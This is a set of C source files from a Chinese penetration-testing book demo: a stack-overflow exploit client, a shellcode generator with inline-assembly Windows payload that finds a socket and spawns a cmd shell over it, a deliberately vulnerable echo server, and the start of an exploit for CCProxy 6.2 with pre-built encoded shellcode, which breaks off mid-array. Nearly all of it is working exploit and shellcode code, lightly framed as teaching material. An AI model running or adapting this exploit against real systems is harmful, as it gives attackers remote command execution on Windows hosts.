/* client_match_string.c - find socket demo
*
* 《网络渗透技术》演示程序
* 作者:san, alert7, eyas, watercloud
*
* 字串匹配查找socket的shellcode演示
*/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#pragma comment (lib,"ws2_32")
// jmp esp address from Chinese Ansi Code Page
/* Hard-coded return-address overwrite: the little-endian bytes of a
 * "jmp esp" gadget in the Chinese (ANSI code page) Windows build the
 * demo was written against.  It is OS-version and locale specific and
 * must be re-located for any other target.  None of the four bytes is
 * 0x00, so the value survives the victim's strcpy()-based copy. */
#define JUMPESP "\x12\x45\xfa\x7f"
#include "shellcode_match_string.c"
// ripped from isno
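/*
 * Make_Connection - open a blocking TCP connection with a connect timeout.
 *
 * address: dotted-quad IPv4 string (parsed with inet_addr(); no DNS).
 * port:    TCP port in host byte order.
 * timeout: connect timeout in seconds.
 *
 * Returns the connected socket (as an int) on success, or a negative code:
 *   -1 socket() failed,
 *   -2 address rejected by inet_addr(),
 *   -3 select() failed,
 *   -4 connect timed out,
 *   -5 connect failed (SO_ERROR non-zero) or getsockopt() misbehaved.
 *
 * The socket is put into non-blocking mode for the timed connect and
 * switched back to blocking mode before it is returned.
 */
int Make_Connection(char *address, int port, int timeout)
{
    struct sockaddr_in target;
    SOCKET s;
    int i;
    DWORD bf;
    fd_set wd;
    struct timeval tv;

    s = socket(AF_INET, SOCK_STREAM, 0);
    /* SOCKET is an unsigned type, so the original "s < 0" could never be
     * true; socket() signals failure with INVALID_SOCKET. */
    if (s == INVALID_SOCKET)
        return -1;

    target.sin_family = AF_INET;
    target.sin_addr.s_addr = inet_addr(address);
    /* inet_addr() reports a malformed address as INADDR_NONE, not 0;
     * the original only rejected "0.0.0.0". */
    if (target.sin_addr.s_addr == INADDR_NONE || target.sin_addr.s_addr == 0)
    {
        closesocket(s);
        return -2;
    }
    target.sin_port = htons((u_short)port);

    /* Non-blocking connect so select() can enforce the timeout. */
    bf = 1;
    ioctlsocket(s, FIONBIO, &bf);
    tv.tv_sec = timeout;
    tv.tv_usec = 0;
    FD_ZERO(&wd);
    FD_SET(s, &wd);
    /* A non-blocking connect() normally returns SOCKET_ERROR with
     * WSAEWOULDBLOCK; the real outcome is read back via SO_ERROR below. */
    connect(s, (struct sockaddr *)&target, sizeof(target));

    i = select((int)(s + 1), 0, &wd, 0, &tv);
    if (i == SOCKET_ERROR)
    {
        closesocket(s);
        return -3;
    }
    if (i == 0)   /* timed out */
    {
        closesocket(s);
        return -4;
    }

    /* Writable: find out whether the connect actually succeeded.  The
     * getsockopt() result itself is now checked too. */
    i = sizeof(int);
    if (getsockopt(s, SOL_SOCKET, SO_ERROR, (char *)&bf, &i) != 0 ||
        bf != 0 || i != sizeof(int))
    {
        closesocket(s);
        return -5;
    }

    /* bf is 0 here (checked above), so this restores blocking mode. */
    ioctlsocket(s, FIONBIO, &bf);
    return (int)s;
}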
/* ripped from TESO code and modifed by ey4s for win32 */
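/* ripped from TESO code and modifed by ey4s for win32 */
/*
 * shell - relay bytes between the local console and a connected socket.
 *
 * sock: the connected socket (a Windows SOCKET passed as int).
 *
 * Loops until either side closes: data arriving on the socket is written
 * to stdout (fd 1); when the socket has been quiet for the one-second
 * select() timeout, a line is read from stdin (fd 0) and sent.  Returns
 * on EOF, on a recv/send/read/write failure, or on a select() error.
 *
 * The original aliased an unsigned long[2] as the fd_set ({fd_count,
 * fd_array[0]}) and treated a failed select() like a timeout, i.e. it fell
 * through to a blocking read of stdin.  A real fd_set is used here and a
 * select() error ends the session.
 */
void shell(int sock)
{
    int l;
    char buf[512];
    struct timeval tv;
    fd_set rd;

    while (1)
    {
        /* select() may clear the set on timeout; rebuild it every pass
         * (the original reset ul[0]/ul[1] for the same reason). */
        FD_ZERO(&rd);
        FD_SET((SOCKET)sock, &rd);
        tv.tv_sec = 1;
        tv.tv_usec = 0;

        l = select(0, &rd, NULL, NULL, &tv);
        if (l == SOCKET_ERROR)
        {
            printf("[-] select error: %d\n", WSAGetLastError());
            return;
        }
        if (l == 1)
        {
            /* Socket readable: pump to the console. */
            l = recv(sock, buf, sizeof(buf), 0);
            if (l <= 0)
            {
                printf("[-] Connection closed.\n");
                return;
            }
            l = write(1, buf, l);
            if (l <= 0)
            {
                printf("[-] Connection closed.\n");
                return;
            }
        }
        else
        {
            /* Timeout: take local input and forward it (blocks on stdin). */
            l = read(0, buf, sizeof(buf));
            if (l <= 0)
            {
                printf("[-] Connection closed.\n");
                return;
            }
            l = send(sock, buf, l, 0);
            if (l <= 0)
            {
                printf("[-] Connection closed.\n");
                return;
            }
        }
    }
}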
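/*
 * main - deliver the string-matching shellcode to server_thread.c (port 4444).
 *
 * Usage: client_match_string remote_addr
 *
 * Payload layout, matching overflow()'s 16-byte stack buffer on the server:
 *   [0..19]   0x90 filler (16 bytes of buff plus the 4-byte saved EBP),
 *   [20..23]  JUMPESP - overwrites the return address with a jmp esp,
 *   [24..]    the encoded shellcode, which ESP points at after the ret.
 * The server copies the payload with strcpy(), so it must not contain a
 * NUL before the shellcode ends; GetShellCode() picks an XOR key that
 * guarantees this.  After the payload, the 4-byte marker "Xc0n" is sent on
 * the same connection so the shellcode's socket scan can identify it, and
 * that connection then carries the shell.
 *
 * Fixes vs. the original: the connect result is kept in an int (a SOCKET
 * is unsigned, so "s < 0" never fired), the shellcode is copied with a
 * bounded memcpy instead of an unbounded strcpy into Buff, the whole of
 * Buff is initialised (the last byte was left indeterminate), unused
 * locals are gone, and the socket is closed on exit.
 */
int main(int argc, char *argv[])
{
    unsigned char Buff[1024];
    char data[4] = "Xc0n";      /* deliberately unterminated: exactly 4 bytes are sent */
    int s;
    WSADATA WSAData;

    if (argc < 2)
    {
        fprintf(stderr, "Usage: %s remote_addr", argv[0]);
        exit(1);
    }

    GetShellCode();
    PrintSc(sh_Buff, sh_Len);
    if (!sh_Len)
    {
        printf("[-] Shellcode generate error.\n");
        exit(1);
    }
    /* JUMPESP occupies [20..23]; the shellcode starts at 24 and must fit. */
    if (24 + sh_Len > sizeof(Buff))
    {
        fprintf(stderr, "[-] Shellcode too large for payload buffer.\n");
        exit(1);
    }

    if (WSAStartup(MAKEWORD(1, 1), &WSAData) != 0)
    {
        fprintf(stderr, "[-] WSAStartup failed.\n");
        WSACleanup();
        exit(1);
    }

    s = Make_Connection(argv[1], 4444, 10);
    if (s < 0)
    {
        fprintf(stderr, "[-] connect err.\n");
        WSACleanup();
        exit(1);
    }

    memset(Buff, 0x90, sizeof(Buff));
    memcpy(Buff + 20, JUMPESP, 4);       /* return address -> jmp esp */
    memcpy(Buff + 24, sh_Buff, sh_Len);  /* shellcode; ESP lands here after ret */
    send(s, Buff, sizeof(Buff), 0);
    Sleep(100);
    send(s, data, 4, 0);                 /* marker the shellcode looks for */

    /* use same socket to get shell */
    shell(s);
    closesocket(s);
    WSACleanup();
    return 0;
}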
/* shellcode_match_string.c
*
* 《网络渗透技术》演示程序
* 作者:san, alert7, eyas, watercloud
*
* 字串匹配查找socket的shellcode演示
*/
/* Eight 0x90 (NOP) bytes emitted into ShellCode()'s machine code.
 * GetShellCode() scans the function for this 8-byte marker (memcmp) to
 * find where the position-independent payload starts, and for the next
 * occurrence to find where it ends; PROC_END is the same byte pattern. */
#define PROC_BEGIN __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90\
__asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90
#define PROC_END PROC_BEGIN
/* Output of GetShellCode(): decoder stub + XOR-encoded payload + hash table. */
unsigned char sh_Buff[1024];
/* Number of valid bytes in sh_Buff; 0 when generation failed. */
unsigned int sh_Len;
/* XOR key selected by GetShellCode(); 0x99 is the value baked into the
 * decode1/decode2 stubs below before they are patched. */
unsigned int Enc_key=0x99;
/* decode1 - XOR decoder stub for payloads of at most 0xFF bytes.
 *
 * Prepended to the encoded payload.  JMP to the CALL; the CALL pushes the
 * address of the byte after itself, which is the first payload byte; POP
 * EBX / DEC EBX leaves EBX one byte before the payload; CL = length; the
 * LOOP XORs [EBX+ECX] for ECX = length..1 (every payload byte) with the
 * key, then the JMP over the CALL lands on the now-decoded payload.
 *
 * GetShellCode() patches decode1[7] (length) and decode1[11] (key).
 */
unsigned char decode1[] =
/*
Reference disassembly (OllyDbg, addresses from the authors' build):
00401004 . /EB 0E JMP SHORT encode.00401014
00401006 $ |5B POP EBX
00401007 . |4B DEC EBX
00401008 . |33C9 XOR ECX,ECX
0040100A . |B1 FF MOV CL,0FF
0040100C > |80340B 99 XOR BYTE PTR DS:[EBX+ECX],99
00401010 .^|E2 FA LOOPD SHORT encode.0040100C
00401012 . |EB 05 JMP SHORT encode.00401019
00401014 > \E8 EDFFFFFF CALL encode.00401006
*/
"\xEB\x0E\x5B\x4B\x33\xC9\xB1"
"\xFF" // shellcode size (8-bit, patched at decode1[7])
"\x80\x34\x0B"
"\x99" // xor byte (patched at decode1[11])
"\xE2\xFA\xEB\x05\xE8\xED\xFF\xFF\xFF";
/* decode2 - XOR decoder stub for payloads longer than 0xFF bytes.
 *
 * Same scheme as decode1, but the length is loaded into CX as a 16-bit
 * immediate (66 B9 imm16), so the LOOP can cover up to 0xFFFF bytes.
 * GetShellCode() patches the two length bytes at decode2[8..9] and the
 * key at decode2[13].
 */
unsigned
char decode2[] =
/* ripped from eyas
Reference disassembly (addresses from the authors' build):
00406030 /EB 10 JMP SHORT 00406042
00406032 |5B POP EBX
00406033 |4B DEC EBX
00406034 |33C9 XOR ECX,ECX
00406036 |66:B9 6601 MOV CX,166
0040603A |80340B 99 XOR BYTE PTR DS:[EBX+ECX],99
0040603E ^|E2 FA LOOPD SHORT 0040603A
00406040 |EB 05 JMP SHORT 00406047
00406042 \E8 EBFFFFFF CALL 00406032
*/
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9"
"\x66\x01" // shellcode size (16-bit little-endian, patched at decode2[8..9])
"\x80\x34\x0B"
"\x99" // xor byte (patched at decode2[13])
"\xE2\xFA\xEB\x05\xE8\xEB\xFF\xFF\xFF";
// kernel32.dll functions index
/* Byte offsets into the address table that follows the payload at run
 * time (esi in ShellCode()).  GetShellCode() appends the hashes of
 * functions[] in order, so entry i sits at offset 4*i and the stub
 * overwrites each hash with the resolved address.  The order here must
 * match the rows of functions[] below.  (Identifiers starting with an
 * underscore and a capital letter are reserved in C; kept as written.) */
#define _LoadLibraryA 0x00
#define _CreateProcessA 0x04
#define _TerminateProcess 0x08
#define _WaitForSingleObjectEx 0x0C
#define _Sleep 0x10
// ws2_32.dll functions index
#define _recv 0x14
#define _ioctlsocket 0x18
// functions number
/* Loop counts used by ShellCode(): how many consecutive table entries are
 * resolved from kernel32.dll and then from ws2_32.dll.  Must equal the
 * number of names listed under each heading below. */
#define _Knums 5
#define _Wnums 2
// Need functions
/* Export names to hash, terminated by the empty string (GetShellCode()
 * stops at functions[i][0] == 0). */
unsigned char functions[100][128] =
{
// kernel32
{"LoadLibraryA"},
{"CreateProcessA"},
{"TerminateProcess"},
{"WaitForSingleObjectEx"},
{"Sleep"},
// ws2_32
{"recv"},
{"ioctlsocket"},
{""},
};
/* Forward declarations: both are used by GetShellCode() before they are defined. */
void PrintSc(unsigned char *lpBuff, int buffsize);
void ShellCode();
// Get function hash
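/*
 * hash - compute the 32-bit export-name hash used by the shellcode.
 *
 * c: NUL-terminated function name (bytes are taken as unsigned).
 *
 * Each byte is folded in as "rotate right 7, then add", mirroring the
 * `ror ebx, 7 / add ebx, edx` loop in ShellCode()'s find_hashfunc_addr,
 * so the host-side value equals what the stub computes at run time.
 *
 * Returns the hash reduced to 32 bits.  The original relied on unsigned
 * long being 32 bits wide; that holds for Win32 but not for LP64 hosts,
 * where the rotate would operate on 64 bits and disagree with the stub.
 * The mask makes the width explicit without changing the return type.
 */
unsigned long hash(unsigned char *c)
{
    unsigned long h = 0;
    while (*c)
    {
        /* (h << 25) | (h >> 7) is a 32-bit rotate right by 7 as long as h
         * is confined to 32 bits; mask after every step to keep it there. */
        h = (((h << 25) | (h >> 7)) + *c++) & 0xFFFFFFFFUL;
    }
    return h;
}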
// get shellcode
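/*
 * GetShellCode - build the deliverable shellcode into sh_Buff / sh_Len.
 *
 * Steps:
 *  1. Hash every name in functions[] (up to the "" sentinel) with hash().
 *     The table is appended to the payload; at run time the stub
 *     overwrites each hash in place with the resolved address.
 *  2. Locate ShellCode()'s machine code between the PROC_BEGIN and
 *     PROC_END NOP markers and copy it out of the running image.
 *  3. Choose an XOR key (0xFF down to 0x01) such that no encoded byte is
 *     0x00 (the payload travels through strcpy()) or 0x5C (excluded by
 *     the authors; presumably a target-specific bad byte).
 *  4. Prepend decode1 (8-bit length) or decode2 (16-bit length) with the
 *     length and key patched in.
 *
 * Outputs are the globals sh_Buff, sh_Len and Enc_key.  On any failure
 * sh_Len is left 0, which callers already test (`if (!sh_Len)`).
 *
 * Fixes vs. the original: a missing start/end marker no longer copies
 * garbage, the payload + hash table is checked against pSc_Buff and the
 * stub + payload against sh_Buff, and the hash table is stored as 4-byte
 * entries regardless of sizeof(unsigned long).
 */
void GetShellCode()
{
    char *fnbgn_str = "\x90\x90\x90\x90\x90\x90\x90\x90\x90";
    char *fnend_str = "\x90\x90\x90\x90\x90\x90\x90\x90\x90";
    unsigned char *pSc_addr;
    unsigned char pSc_Buff[1024];
    unsigned int MAX_Sc_Len = 0x2000;
    /* The stub reads the table as DWORDs and it is copied as i*4 bytes,
     * so the elements must be 32-bit (unsigned long is 64-bit on LP64). */
    unsigned int dwHash[100];
    unsigned int dwHashSize;
    unsigned int stub_len;
    int l, i, j, k;

    sh_Len = 0;

    /* 1. Function hashes, in the order the index #defines expect. */
    for (i = 0; ; i++) {
        if (functions[i][0] == '\x0') break;
        dwHash[i] = (unsigned int)hash(functions[i]);
    }
    dwHashSize = i * 4;

    /* 2. Carve ShellCode()'s body out of the running image. */
    pSc_addr = (unsigned char *)ShellCode;
    for (k = 0; (unsigned int)k < MAX_Sc_Len; ++k) {
        if (memcmp(pSc_addr + k, fnbgn_str, 8) == 0) {
            break;
        }
    }
    if ((unsigned int)k >= MAX_Sc_Len) {
        return;    /* start marker not found */
    }
    pSc_addr += (k + 8);    /* start of the ShellCode */
    for (k = 0; (unsigned int)k < MAX_Sc_Len; ++k) {
        if (memcmp(pSc_addr + k, fnend_str, 8) == 0) {
            break;
        }
    }
    if ((unsigned int)k >= MAX_Sc_Len || (unsigned int)k + dwHashSize > sizeof(pSc_Buff)) {
        return;    /* end marker not found, or code + hashes would overflow pSc_Buff */
    }
    sh_Len = k;    /* length of the ShellCode */
    memcpy(pSc_Buff, pSc_addr, sh_Len);
    /* Append the hash table right after the code: the stub finds it via
     * the return address its trailing `call func_start` pushes. */
    memcpy(pSc_Buff + sh_Len, dwHash, dwHashSize);
    sh_Len += dwHashSize;

    /* 3. Find an XOR key that leaves no forbidden byte in the encoded
     * payload.  Other candidates the authors tried and disabled:
     * 0x26 '%', 0x3D '=', 0x3F '?', 0x40 '@', 0x0D, 0x0A. */
    for (i = 0xff; i > 0; i--)
    {
        l = 0;
        for (j = 0; j < (int)sh_Len; j++)
        {
            if (((pSc_Buff[j] ^ i) == 0x00) ||    /* would terminate strcpy() */
                ((pSc_Buff[j] ^ i) == 0x5C))      /* '\\' */
            {
                l++;
                break;
            }
        }
        if (l == 0)
        {
            Enc_key = i;
            for (j = 0; j < (int)sh_Len; j++)
            {
                pSc_Buff[j] ^= Enc_key;
            }
            break;    /* break when found xor byte */
        }
    }

    /* No xor byte found */
    if (l != 0) {
        sh_Len = 0;
        return;
    }

    /* 4. Prepend the matching decoder stub.
     * NOTE(review): the stub's own bytes (patched length and key) are not
     * screened against 0x00/0x5C - e.g. a length of 0x100 puts a 0x00 into
     * decode2 - confirm before relying on this for a new payload size. */
    stub_len = (sh_Len > 0xFF) ? (unsigned int)sizeof(decode2) - 1
                               : (unsigned int)sizeof(decode1) - 1;
    if (stub_len + sh_Len > sizeof(sh_Buff)) {
        sh_Len = 0;    /* would overflow sh_Buff */
        return;
    }
    if (sh_Len > 0xFF) {
        /* decode2: 16-bit length at [8..9], key at [13]. */
        *(unsigned short *)&decode2[8] = (unsigned short)sh_Len;
        decode2[13] = (unsigned char)Enc_key;
        memcpy(sh_Buff, decode2, stub_len);
    }
    else {
        /* decode1: 8-bit length at [7], key at [11]. */
        decode1[7] = (unsigned char)sh_Len;
        decode1[11] = (unsigned char)Enc_key;
        memcpy(sh_Buff, decode1, stub_len);
    }
    memcpy(sh_Buff + stub_len, pSc_Buff, sh_Len);
    sh_Len += stub_len;
}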
// print shellcode
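// print shellcode
//
// PrintSc - dump a byte buffer to stderr as a C string literal.
//
// lpBuff:   bytes to print.
// buffsize: number of bytes.
//
// Output: a C comment giving the byte count, then the bytes as "\xNN"
// escapes in lowercase hex, 16 per line, each line wrapped in double
// quotes, ending with ";".
//
// The original formatted each byte with sprintf("\\x%.2X") into
// char msg[4]: that writes 5 bytes (4 characters plus the NUL), a
// one-byte stack overflow on every byte printed, and then lower-cased
// the text with the non-portable _tolower().  Printing straight to
// stderr with "%02x" produces identical output without the temporary.
void PrintSc(unsigned char *lpBuff, int buffsize)
{
    int i;

    fprintf(stderr, "/* %d bytes */\n", buffsize);
    for (i = 0; i < buffsize; i++)
    {
        if ((i % 16) == 0)
        {
            if (i != 0)
                fprintf(stderr, "\"\n\"");   /* close the line, open the next */
            else
                fprintf(stderr, "\"");
        }
        fprintf(stderr, "\\x%02x", lpBuff[i] & 0xff);
    }
    fprintf(stderr, "\";\n");
}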
// shellcode function
// shellcode function
/*
 * ShellCode - position-independent Win32 x86 payload (MSVC inline asm).
 *
 * Never called directly.  GetShellCode() copies the bytes between the
 * PROC_BEGIN and PROC_END NOP markers out of this function and appends the
 * hash table built from functions[].  At run time the code therefore ends
 * where the table begins; the trailing `call func_start` pushes exactly
 * that address, which `pop edi` picks up.  PEB/LDR/PE offsets and the
 * stdcall argument pushes are those of 32-bit Windows.
 *
 * Flow: resolve kernel32 exports by hash -> LoadLibraryA("ws2_32") ->
 * resolve ws2_32 exports -> scan handle values for the socket that has
 * exactly the 4-byte marker "Xc0n" pending -> CreateProcessA("cmd") with
 * its standard handles bound to that socket -> TerminateProcess(self).
 */
void ShellCode()
{
__asm{
PROC_BEGIN //C macro to begin proc
jmp locate_addr
func_start:
pop edi ; get eip: the pushed return address = first byte after the code = the hash table
mov eax, fs:30h ; TEB -> PEB
mov eax, [eax+0Ch] ; PEB -> Ldr
mov esi, [eax+1Ch] ; Ldr -> InInitializationOrderModuleList.Flink (first entry)
lodsd ; Flink of the first entry -> second entry
mov ebp, [eax+8] ; base address of kernel32.dll
; NOTE(review): assumes kernel32.dll is the second module in initialization
; order, as on the Windows releases this demo targets - verify on newer ones.
mov esi, edi ; esi = start of the table; each hash is replaced in place by its address
push _Knums
pop ecx
GetKFuncAddr: ; find functions from kernel32.dll
call find_hashfunc_addr ; resolves the hash at [edi], stores the address there, edi += 4
loop GetKFuncAddr
push 3233h
push 5F327377h ; "ws2_32" NUL-terminated on the stack ("ws2_" then "32\0\0")
push esp
call dword ptr [esi+_LoadLibraryA]
mov ebp, eax ; base address of ws2_32.dll
push _Wnums
pop ecx
GetWFuncAddr: ; find functions from ws2_32.dll
call find_hashfunc_addr
loop GetWFuncAddr
find_s:
xor ebx, ebx
push 1000 ; sleep to wait for character send
call dword ptr [esi+_Sleep] ; maybe it is necessary in real internet
find_s_loop:
inc ebx ; candidate handle value, tried in increasing order from 1
push 1 ; bAlertable
push 10 ; dwMilliseconds
push ebx
call dword ptr [esi+_WaitForSingleObjectEx]
test eax, eax ; a return of 0 is taken to mean "ebx is a socket handle"
jnz find_s_loop
push 0 ; FIONREAD out argument; survives the stdcall since only 3 args are popped
push esp
push 4004667Fh ; FIONREAD
push ebx
call dword ptr [esi+_ioctlsocket]
pop ecx ; bytes pending on this socket
cmp ecx, 4 ; the client sends exactly the 4 marker bytes
jne find_s_loop
push eax ; 4 bytes of stack to receive into
mov ebp, esp
push 0 ; flags
push 4 ; len
push ebp ; buf
push ebx ; s
call dword ptr [esi+_recv]
pop eax
cmp eax, 6E306358h ; "Xc0n" as a little-endian dword
jnz find_s_loop
; ebx is the client's socket.  Reserve PROCESS_INFORMATION (0x10 bytes) at
; [edi] followed by STARTUPINFOA (0x44 bytes) at [edi+10h] on the stack.
sub esp, 54h
mov edi, esp
xor eax, eax
push 14h
pop ecx
stack_zero1: ; zero dwords [edi+4] .. [edi+50h] (ecx runs 14h..1; [edi] itself is an output field)
mov [edi+ecx*4], eax
loop stack_zero1
mov byte ptr [edi+10h], 44h ; si.cb = sizeof(STARTUPINFOA)
inc byte ptr [edi+3Ch] ; si.dwFlags |= STARTF_USESHOWWINDOW (0x001)
inc byte ptr [edi+3Dh] ; si.dwFlags |= STARTF_USESTDHANDLES (0x100)
mov [edi+48h], ebx ; si.hStdInput  = socket
mov [edi+4Ch], ebx ; si.hStdOutput = socket
mov [edi+50h], ebx ; si.hStdError  = socket
lea eax, [edi+10h] ; &si
push 646D63h ; "cmd", NUL-terminated
mov ebx, esp
; CreateProcessA(NULL, "cmd", NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi); ecx is 0 after the loop
push edi ; pi
push eax ; si
push ecx ; lpCurrentDirectory = NULL
push ecx ; lpEnvironment = NULL
push ecx ; dwCreationFlags = 0
push 1 ; bInheritHandles = TRUE, so cmd inherits the socket as its std handles
push ecx ; lpThreadAttributes = NULL
push ecx ; lpProcessAttributes = NULL
push ebx ; "cmd"
push ecx ; lpApplicationName = NULL
call dword ptr [esi+_CreateProcessA]
; TerminateProcess(-1 = current-process pseudo handle, <next dword on the stack>)
xor eax, eax
dec eax
push eax
call dword ptr [esi+_TerminateProcess]
find_hashfunc_addr:
; in: ebp = module base, [edi] = wanted hash.  out: [edi] = export address, edi += 4.
; Walks the export name table hashing each name with ror-7/add (same as hash() in C)
; until one matches.  No end-of-table check: an unknown hash runs off the end.
push ecx
push esi
mov esi, [ebp+3Ch] ; e_lfanew
mov esi, [esi+ebp+78h] ; ExportDirectory RVA
add esi, ebp ; rva2va
push esi
mov esi, [esi+20h] ; AddressOfNames RVA
add esi, ebp ; rva2va
xor ecx, ecx
dec ecx
find_start:
inc ecx ; name index
lodsd ; next name RVA
add eax, ebp
xor ebx, ebx
hash_loop:
movsx edx, byte ptr [eax]
cmp dl, dh ; dh is the sign extension (0 for ASCII): stop at the NUL terminator
jz short find_addr
ror ebx, 7 ; hash
add ebx, edx
inc eax
jmp short hash_loop
find_addr:
cmp ebx, [edi] ; compare to hash
jnz short find_start
pop esi ; ExportDirectory
mov ebx, [esi+24h] ; AddressOfNameOrdinals RVA
add ebx, ebp ; rva2va
mov cx, [ebx+ecx*2] ; FunctionOrdinal
mov ebx, [esi+1Ch] ; AddressOfFunctions RVA
add ebx, ebp ; rva2va
mov eax, [ebx+ecx*4] ; FunctionAddress RVA
add eax, ebp ; rva2va
stosd ; function address save to [edi]
pop esi
pop ecx
retn
locate_addr:
call func_start ; pushes the address of PROC_END, i.e. where GetShellCode() appends the hash table
PROC_END //C macro to end proc
}
}
/* server_thread.c
*
* 《网络渗透技术》演示程序
* 作者:san, alert7, eyas, watercloud
*
* 存在缓冲区溢出漏洞的多线程服务端演示
*/
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#pragma comment(lib,"ws2_32")
/* The listening socket (bound to 0.0.0.0:4444 in main()). */
SOCKET listenFD;
/*
 * overflow - the deliberately vulnerable sink of this demo server.
 *
 * p is the NUL-terminated data a client sent (tt() terminates it).  It is
 * copied with strcpy() into a 16-byte stack buffer with no length check,
 * so anything longer than 16 bytes overwrites whatever the compiler placed
 * after buff.  On the 32-bit build without stack cookies that the demo
 * assumes, that is the saved EBP and then the return address at payload
 * offset 20 - which is why client_match_string.c writes its jmp-esp
 * address at Buff+20 and the shellcode at Buff+24.  Do not "fix" this if
 * the demo is to keep working; never use this pattern in real code.
 */
void overflow(char *p)
{
char buff[0x10];
strcpy(buff, p);
printf("%s", buff);
}
/*
 * tt - per-client thread: echo server that feeds input to overflow().
 *
 * lp: the accepted client SOCKET, passed as the thread parameter.
 *
 * Receives up to 0x7FF bytes at a time, NUL-terminates them, passes the
 * string through overflow() (the vulnerable function) and echoes the
 * bytes back.  Leaves the loop on recv() returning 0 or an error, logs
 * WSAGetLastError(), closes the socket and exits the thread with 0.
 */
DWORD WINAPI tt(LPVOID lp)
{
    SOCKET client = (SOCKET)lp;
    char line[0x800];
    int got;

    for (;;)
    {
        got = recv(client, line, sizeof(line) - 1, 0);//overflow
        printf("recv %d bytes!\n", got);
        if (got <= 0)
        {
            printf("[-] recv error:%d\n", WSAGetLastError());
            break;
        }
        line[got] = '\x0';   /* one byte was held back for the terminator */
        overflow(line);
        send(client, line, got, 0);
    }
    closesocket(client);
    return 0;
}
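/*
 * main - multi-threaded echo server with a stack overflow (demo target).
 *
 * Listens on 0.0.0.0:4444 and starts tt() for every accepted client; each
 * client thread passes what it receives through overflow(), the
 * intentionally vulnerable function.  This program exists to be exploited
 * by client_match_string.c and must only be run in an isolated lab.
 *
 * Fixes vs. the original: WSAStartup/WSASocket/bind/listen results are
 * checked (a failed bind otherwise spun forever in accept()), an accept()
 * failure no longer starts a thread on INVALID_SOCKET, the thread handle
 * from CreateThread is closed instead of leaked, and the unused extra
 * socket and buffer are gone.  Returns 1 on a setup failure; otherwise
 * serves forever.
 */
int main(void)
{
    struct sockaddr_in server;
    WSADATA wsd;
    SOCKET client;
    HANDLE th;

    if (WSAStartup(MAKEWORD(2, 2), &wsd) != 0)
    {
        printf("[-] WSAStartup failed\n");
        return 1;
    }
    /* The original's WSASocket(2,1,0,...) is AF_INET, SOCK_STREAM. */
    listenFD = WSASocket(AF_INET, SOCK_STREAM, 0, 0, 0, 0);
    if (listenFD == INVALID_SOCKET)
    {
        printf("[-] socket error:%d\n", WSAGetLastError());
        WSACleanup();
        return 1;
    }
    printf("[+] listen socket: %x\n", (unsigned)listenFD);

    server.sin_family = AF_INET;
    server.sin_port = htons(4444);
    server.sin_addr.s_addr = 0;    /* INADDR_ANY */
    if (bind(listenFD, (struct sockaddr *)&server, sizeof(server)) == SOCKET_ERROR ||
        listen(listenFD, 100) == SOCKET_ERROR)
    {
        printf("[-] bind/listen error:%d\n", WSAGetLastError());
        closesocket(listenFD);
        WSACleanup();
        return 1;
    }

    while (1)
    {
        client = accept(listenFD, 0, 0);
        if (client == INVALID_SOCKET)
        {
            printf("[-] accept error:%d\n", WSAGetLastError());
            continue;
        }
        printf("[+] client socket: %x\n", (unsigned)client);
        /* tt() owns and closes the client socket.  The thread handle is
         * not used here, so release it at once rather than leak one per
         * connection. */
        th = CreateThread(0, 0, tt, (LPVOID)client, 0, 0);
        if (th != NULL)
            CloseHandle(th);
    }
}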
/* exploit.c
*
* CCProxy6.2 溢出演示程序
* 作者:cooldiyer
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#pragma comment (lib,"ws2_32")
// jmp esp address of chinese version
/* Hard-coded return-address overwrite: the little-endian bytes of a
 * "jmp esp" gadget in the Chinese Windows build this exploit was written
 * against.  OS-version and locale specific; must be re-located for any
 * other target.  Contains no 0x00 byte. */
#define JUMPESP "\x12\x45\xfa\x7f"
// match string shellcode
// match string shellcode
/* Pre-generated output of GetShellCode() (shellcode_match_string.c):
 * 310 bytes.  The first 23 bytes are the decode2 stub with a 16-bit
 * payload length of 0x011F at offset 8 and the XOR key 0xF8 at offset 13;
 * the encoded payload and its function-hash table follow.  The generator
 * excludes 0x00 and 0x5C from the encoded bytes.  The array carries a
 * trailing NUL from the literal, so users copy sizeof(shellcode) - 1. */
char shellcode[] =
"\xeb\x10\x5b\x4b\x33\xc9\x66\xb9\x1f\x01\x80\x34\x0b\xf8\xe2\xfa"
"\xeb\x05\xe8\xeb\xff\xff\xff\x11\x01\xf8\xf8\xf8\xa7\x9c\x59\xc8"
"\xf8\xf8\xf8\x73\xb8\xf4\x73\x88\xe4\x55\x73\x90\xf0\x73\x0f\x92"
"\xfd\xa1\x10\x61\xf8\xf8\xf8\x1a\x01\x90\xcb\xca\xf8\xf8\x90\x8f"
"\x8b\xca\xa7\xac\x07\xee\x73\x10\x92\xfa\xa1\x10\x78\xf8\xf8\xf8"
"\x1a\x01\xcb\x23\x90\x10\xfb\xf8\xf8\x07\xae\xe8\xbb\x92\xf9\x92"
"\xf2\xab\x07\xae\xf4\x7d\x38\x8d\x0b\x92\xf8\xac\x90\x87\x9e\xfc"
"\xb8\xab\x07\xae\xe0\xa1\x7b\x01\xfc\x8d\x19\xa8\x73\x14\x92\xf8"
"\x92\xfc\xad\xab\x07\xae\xec\xa0\xc5\xa0\x9b\xc8\x96\x8d\x35\x7b"
"\x14\xac\x73\x04\xcb\x38\x92\xec\xa1\x71\xfc\x77\x1a\x03\x3e\xbf"
"\xe8\xbc\x06\xbf\xc4\x06\xbf\xc5\x71\xa7\xb0\x71\xa7\xb4\x71\xa7"
"\xa8\x75\xbf\xe8\x90\x9b\x95\x9c\xf8\x73\x24\xaf\xa8\xa9\xa9\xa9"
"\x92\xf9\xa9\xa9\xab\xa9\x07\xae\xfc\xcb\x38\xb0\xa8\x07\xae\xf0"
"\xa9\xae\x73\x8d\xc4\x73\x8c\xd6\x80\xfb\x0d\xae\x73\x8e\xd8\xfb"
"\x0d\xcb\x31\xb1\xb9\x55\xfb\x3d\xcb\x23\xf7\x46\xe8\xc2\x2e\x8c"
"\xf0\x39\x33\xff\xfb\x22\xb8\x13\x09\xc3\xe7\x8d\x1f\xa6\x73\xa6"
"\xdc\xfb\x25\x9e\x73\xf4\xb3\x73\xa6\xe4\xfb\x25\x73\xfc\x73\xfb"
